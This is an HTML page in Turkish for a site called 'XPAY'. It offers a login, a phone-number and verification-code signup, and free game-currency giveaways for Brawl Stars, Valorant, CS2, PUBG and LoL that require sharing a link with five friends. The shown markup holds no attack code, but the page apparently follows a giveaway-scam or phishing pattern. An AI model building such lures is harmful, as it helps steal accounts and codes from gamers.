<!DOCTYPE html>
<html lang="tr">
<head>
  <meta charset="UTF-8" />
  <div class="logo">
  <img src="/images/XPAY.png" alt="logo">
</div>
  <link rel="stylesheet" href="/styles.css" />
</head>
<body>

  
  <div class="auth-wrapper">

    <!-- LOGIN -->
    <div class="auth-card" id="loginCard">
      <div class="logo">
  <img src="/images/XPAY.png" alt="logo">
</div>
      <input type="text" id="username" placeholder="Kullanıcı Adı">
      <input type="password" id="password" placeholder="Şifre">
      <p id="loginError" style="display:none;color:#ef4444;font-size:13px;margin-top:10px;">
        Kullanıcı bulunamadı
      </p>      
      <button id="loginBtn" type="button">Giriş Yap</button>
      <div class="divider">veya</div>
      <button class="secondary" type="button" onclick="showRegister()">Kayıt Ol</button>
    </div>

    <!-- REGISTER -->
    <div class="auth-card hidden" id="registerCard">
      <h1>KAYIT</h1>
      <input type="tel" id="registerPhone" placeholder="05XXXXXXXXX" maxlength="11" />
      <button id="registerSubmit" class="progress-btn" type="button">
        <span class="btn-text">Gönder</span>
        <span class="spinner"></span>
      </button>      
      <button class="secondary" type="button" onclick="showLogin()">Giriş Yap</button>
    </div>

    <!-- VERIFY -->
    <div class="auth-card hidden" id="verifyCard">
      <h1>DOĞRULAMA</h1>
      <input id="verifyCode" type="text" placeholder="Kod">
      <button id="verifySubmit" class="progress-btn">
        <span class="btn-text">Gönder</span>
        <div class="progress-bar"></div>
      </button>
    </div>

    <!-- SUCCESS -->
    <div class="auth-card hidden" id="successScreen">
      <h1>KAYIT BAŞARILI</h1>
      <div class="spinner"></div>
    </div>

  </div>

<div id="mainMenu" class="main-menu" style="display: none;">
  <div class="topbar">
  </div>

  <header class="main-header">
    <div class="logo">
  <img src="/images/XPAY.png" alt="logo">
</div>

    <div class="search-box">
      <input type="text" placeholder="Oyun, kategori veya ürün ara..." />
     <button class="search-btn">
        🔍
     </button>

    <div class="header-actions">
     <button class="profile-btn" aria-label="Profil"></button>
    </div>
  </header>

  <nav class="main-nav">
    <a href="#">Anasayfa</a>
    <a href="#">Oyunlar</a>
    <a href="#">Etkinlikler</a>
    <a href="#">Market</a>
    <a href="#">Destek</a>
  </nav>

  <section class="hero-section">
    <div class="hero-banner">
      <h2>Büyük Etkinlik Başladı</h2>
      <p>Özel içerikler, ödüller ve oyun kategorileri burada yer alacak.</p>
      <button>Hemen İncele</button>
    </div>

    <section class="games-section">
  <h2 class="section-title">Yakındaki Etkinlikler</h2>

  <div class="games-grid">

<div class="game-card"
     data-title="Brawl Stars Elmas Çekilişi"
     data-img="/images/brawl.jpg"
     data-desc="Bu etkinlikte Brawl Stars oyuncuları için ödüllü çekiliş düzenlenmektedir. Katılım ücretsizdir. Kazananlar etkinlik sonunda açıklanacaktır.">
  <img src="/images/brawl.jpg" />
  <h3>Brawl Stars Elmas Çekilişi</h3>
</div>

    <div class="game-card"
      data-title="Valorant VP Çekilişi"
      data-img="/images/valo.jpg"
      data-desc="Bu etkinlikte Valorant oyuncuları için VP ödüllü çekiliş düzenlenmektedir. Katılım ücretsizdir. Kazananlar etkinlik sonunda açıklanacaktır.
      İnstagram'dan gelen kullanıcılarımızın bilet al butonuna tıklayıp paylaşım linkini 5 arkadaşına göndermesi durumunda çekilişe hak kazanmış sayılır.
      Çekiliş sonuçlarını İnstagram sayfamız üzerinden takip edebilirsiniz.">
      <img src="/images/valo.jpg" />
      <h3>Valorant VP Çekilişi</h3>
    </div>

    <div class="game-card"
      data-title="CS2 Skin Takas Ve Satışları"
      data-img="/images/cs2.jpg"
      data-desc="Bu etkinlikte Cs2 oyuncuları için İtem ödüllü çekiliş düzenlenmektedir. Katılım ücretsizdir. Kazananlar etkinlik sonunda açıklanacaktır.
      İnstagram'dan gelen kullanıcılarımızın bilet al butonuna tıklayıp paylaşım linkini 5 arkadaşına göndermesi durumunda çekilişe hak kazanmış sayılır.
      Çekiliş sonuçlarını İnstagram sayfamız üzerinden takip edebilirsiniz.">
      <img src="/images/cs2.jpg" />
      <h3>CS2 Skin Takas Ve Satışları</h3>
    </div>

    <div class="game-card"
      data-title="PUBG MOBİLE UC Çekilişi"
      data-img="/images/pubg.jpg"
      data-desc="Bu etkinlikte Pubg Mobile oyuncuları için UC ödüllü çekiliş düzenlenmektedir. Katılım ücretsizdir. Kazananlar etkinlik sonunda açıklanacaktır.
      İnstagram'dan gelen kullanıcılarımızın bilet al butonuna tıklayıp paylaşım linkini 5 arkadaşına göndermesi durumunda çekilişe hak kazanmış sayılır.
      Çekiliş sonuçlarını İnstagram sayfamız üzerinden takip edebilirsiniz.">
      <img src="/images/pubg.jpg" />
      <h3>PUBG MOBİLE UC Çekilişi </h3>
    </div>

    <div class="game-card"
       data-title="League of Legends RP Çekilişi"
       data-img="/images/lol.jpeg"
       data-desc="Bu etkinlikte League of Legends oyuncuları için RP ödüllü çekiliş düzenlenmektedir. Katılım ücretsizdir. Kazananlar etkinlik sonunda açıklanacaktır.
      İnstagram'dan gelen kullanıcılarımızın bilet al butonuna tıklayıp paylaşım linkini 5 arkadaşına göndermesi durumunda çekilişe hak kazanmış sayılır.
      Çekiliş sonuçlarını İnstagram sayfamız üzerinden takip edebilirsiniz.">
      <img src="/images/lol.jpeg" />
      <h3>League of Legends RP Çekilişi</h3>
    </div>

  </div>
</section>

    <div class="side-cards">
<div class="side-card countdown-card">
  <img src="/images/brawl.jpg" alt="Brawl Stars Elmas Çekilişi" class="countdown-image">

  <h3>ELMAS ÇEKİLİŞİ İÇİN ZAMAN DARALIYOR!</h3>

  <div id="countdownTimer">00G 00:00:00</div>
</div>

      <div class="side-card">Duyuru 2</div>
    </div>
  </section>
</div>

  <!-- ŞİMDİLİK KAPALI -->
  <script src="/script.js"></script>
  <script src="https://cdn.socket.io/4.7.5/socket.io.min.js"></script>

  <div id="eventOverlay" class="event-overlay hidden">
  <div class="event-modal">
    <button id="closeEventModal" class="close-event-modal">×</button>
    <img id="eventModalImg" src="" alt="">
    <div class="event-modal-content">
      <h2 id="eventModalTitle"></h2>
      <p id="eventModalDesc"></p>
    </div>
  </div>
</div>
</body>
</html>
